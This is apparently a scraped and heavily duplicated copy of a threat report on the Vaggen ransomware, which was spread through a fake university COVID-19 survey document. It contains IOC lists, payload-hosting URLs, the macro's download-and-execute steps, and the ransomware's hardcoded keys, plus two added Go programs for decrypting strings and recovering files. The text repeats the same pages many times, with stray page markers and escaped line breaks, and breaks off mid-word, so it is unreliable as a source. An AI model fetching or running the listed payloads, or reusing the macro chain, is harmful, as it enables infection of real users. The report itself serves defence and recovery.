notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
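The string decryption described in the Vaggen ransomware section (Base64 decode, then XXTEA with the hardcoded key “STALKER”) is what an analyst has to reproduce to read the ransom note out of the binary without running it. The Go program below is an added example, not the malware's code and not the xxtea-go library: it is a stand-alone reimplementation of the reference XXTEA (btea) routine using the conventions xxtea-go is assumed to follow, namely little-endian 32-bit words, a key zero-padded to 16 bytes, and the plaintext byte count stored in a trailing word. EncodeString exists only to build a constructed sample; DecodeString is the direction that matters. If a blob extracted from a real sample does not decode, that word layout is the first assumption to revisit.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

const delta uint32 = 0x9e3779b9

// toWords packs bytes into little-endian 32-bit words, zero-padding the tail.
func toWords(data []byte) []uint32 {
	words := make([]uint32, (len(data)+3)/4, (len(data)+3)/4+1)
	for i, b := range data {
		words[i/4] |= uint32(b) << (8 * uint(i%4))
	}
	return words
}

// fromWords is the inverse packing.
func fromWords(words []uint32) []byte {
	out := make([]byte, 4*len(words))
	for i, w := range words {
		binary.LittleEndian.PutUint32(out[4*i:], w)
	}
	return out
}

// fixKey zero-pads (or truncates) the key to 16 bytes, as xxtea-go's fixk is
// assumed to do for a short key such as "STALKER".
func fixKey(key []byte) [4]uint32 {
	padded := make([]byte, 16)
	copy(padded, key)
	w := toWords(padded)
	return [4]uint32{w[0], w[1], w[2], w[3]}
}

// mx is the mixing function of the reference btea routine (Wheeler and Needham).
func mx(sum, y, z uint32, p, e uint, k [4]uint32) uint32 {
	return ((z>>5 ^ y<<2) + (y>>3 ^ z<<4)) ^ ((sum ^ y) + (k[(p&3)^e] ^ z))
}

// btea encrypts (or, with decrypt set, decrypts) v in place; needs len(v) >= 2.
func btea(v []uint32, k [4]uint32, decrypt bool) {
	n := len(v)
	rounds := 6 + 52/n
	if !decrypt {
		var sum uint32
		z := v[n-1]
		for ; rounds > 0; rounds-- {
			sum += delta
			e := uint(sum>>2) & 3
			for p := 0; p < n-1; p++ {
				v[p] += mx(sum, v[p+1], z, uint(p), e, k)
				z = v[p]
			}
			v[n-1] += mx(sum, v[0], z, uint(n-1), e, k)
			z = v[n-1]
		}
		return
	}
	sum, y := uint32(rounds)*delta, v[0]
	for ; rounds > 0; rounds-- {
		e := uint(sum>>2) & 3
		for p := n - 1; p > 0; p-- {
			v[p] -= mx(sum, y, v[p-1], uint(p), e, k)
			y = v[p]
		}
		v[0] -= mx(sum, y, v[n-1], 0, e, k)
		y = v[0]
		sum -= delta
	}
}

// EncodeString is the forward direction (XXTEA with a trailing length word,
// then Base64), used here only to build samples; it is not the malware's code.
func EncodeString(plain string, key []byte) string {
	v := append(toWords([]byte(plain)), uint32(len(plain))) // byte count last (assumed xxtea-go layout)
	btea(v, fixKey(key), false)
	return base64.StdEncoding.EncodeToString(fromWords(v))
}

// DecodeString is the decoding the binary applies to its embedded strings:
// Base64 decode, XXTEA decrypt, then strip the length word, whose value must
// fit the word count (the only integrity check XXTEA offers; a wrong key fails it).
func DecodeString(b64 string, key []byte) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct) < 8 || len(ct)%4 != 0 {
		return "", errors.New("ciphertext must be a multiple of 4 bytes and at least 8 bytes")
	}
	v := toWords(ct)
	btea(v, fixKey(key), true)
	n, limit := int(v[len(v)-1]), 4*(len(v)-1)
	if n > limit || n < limit-3 {
		return "", errors.New("length word out of range: wrong key or corrupt data")
	}
	return string(fromWords(v[:len(v)-1])[:n]), nil
}

func main() {
	blob := EncodeString("All your files are encrypted. Pay 80 USD in BTC.", []byte("STALKER")) // constructed sample
	fmt.Println(DecodeString(blob, []byte("STALKER")))
}
```

The length-word check is worth keeping even though it is weak: XXTEA has no authentication, so it is the only signal that a candidate key (or a candidate Base64 chunk pulled from the binary's string table) is wrong before the output is trusted.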
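Recovering a .VAGGEN file as the Vaggen ransomware section describes (AES-256-GCM, the 12-byte nonce followed by the ciphertext and the 16-byte tag, key du_tar_mitt_hjart_mina_pengarna0), as an added example in Go rather than the malware's or the authors' code. EncryptVaggen is this example's own reconstruction of the on-disk layout and exists only to build test data offline; RecoverFile assumes the malware keeps the original file name and merely appends .VAGGEN. Because GCM authenticates the ciphertext, gcm.Open refuses a wrong key, a truncated file or a flipped byte with an error instead of writing garbage, which is the check to rely on before trusting any recovered file.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"os"
	"strings"
)

// vaggenKey is the 32-byte key the analysis recovered from the binary; with
// aes.NewCipher a 32-byte key selects AES-256.
var vaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

const (
	nonceSize = 12 // standard GCM nonce, generated per file by CryptGenRandom
	tagSize   = 16 // GCM tag appended after the ciphertext
	ext       = ".VAGGEN"
)

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// DecryptVaggen reverses the on-disk layout nonce || ciphertext || tag.
// gcm.Open verifies the tag before returning, so a wrong key, a truncated
// file or a flipped byte yields an error rather than garbage plaintext.
func DecryptVaggen(blob, key []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
}

// EncryptVaggen is this example's reconstruction of the layout, used only to
// build test data: a fresh random nonce, then gcm.Seal appends ciphertext and
// tag after it. It is not the malware's code.
func EncryptVaggen(plain, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plain, nil), nil
}

// RecoverFile decrypts one .VAGGEN file and writes the plaintext beside it
// under the original name (assumption: the malware only appends the
// extension). The encrypted original is left in place for forensics, and an
// existing output file is never overwritten.
func RecoverFile(path string, key []byte) (string, error) {
	if !strings.HasSuffix(strings.ToUpper(path), ext) {
		return "", fmt.Errorf("%s: not a %s file", path, ext)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	plain, err := DecryptVaggen(blob, key)
	if err != nil {
		return "", fmt.Errorf("%s: %w", path, err)
	}
	out := path[:len(path)-len(ext)]
	f, err := os.OpenFile(out, os.O_WRONLY|os.O_CREATE|os.O_EXCL, 0o600)
	if err != nil {
		return "", err
	}
	defer f.Close()
	if _, err := f.Write(plain); err != nil {
		return "", err
	}
	return out, nil
}

func main() {
	// Constructed sample: encrypt in memory with the recovered key, then decrypt it.
	blob, err := EncryptVaggen([]byte("grant proposal draft, section 3"), vaggenKey)
	if err != nil {
		panic(err)
	}
	plain, err := DecryptVagg(blob)
	if err != nil {
		panic(err)
	}
	fmt.Printf("%d-byte .VAGGEN blob -> %q\n", len(blob), plain)
}

// DecryptVagg is a convenience wrapper using the recovered key.
func DecryptVagg(blob []byte) ([]byte, error) { return DecryptVaggen(blob, vaggenKey) }
```

On a real host, walk the affected directories and call RecoverFile on every .VAGGEN path; a non-nil error on any file means that file was not produced by this key and layout and should be set aside rather than overwritten.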
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2788 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2789 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2790 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2791 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2792 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2793 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2794 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2795 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2796 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2797 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2798 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2799 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2800 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2801 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2802 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2803 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2804 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2805 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2806 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2807 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen 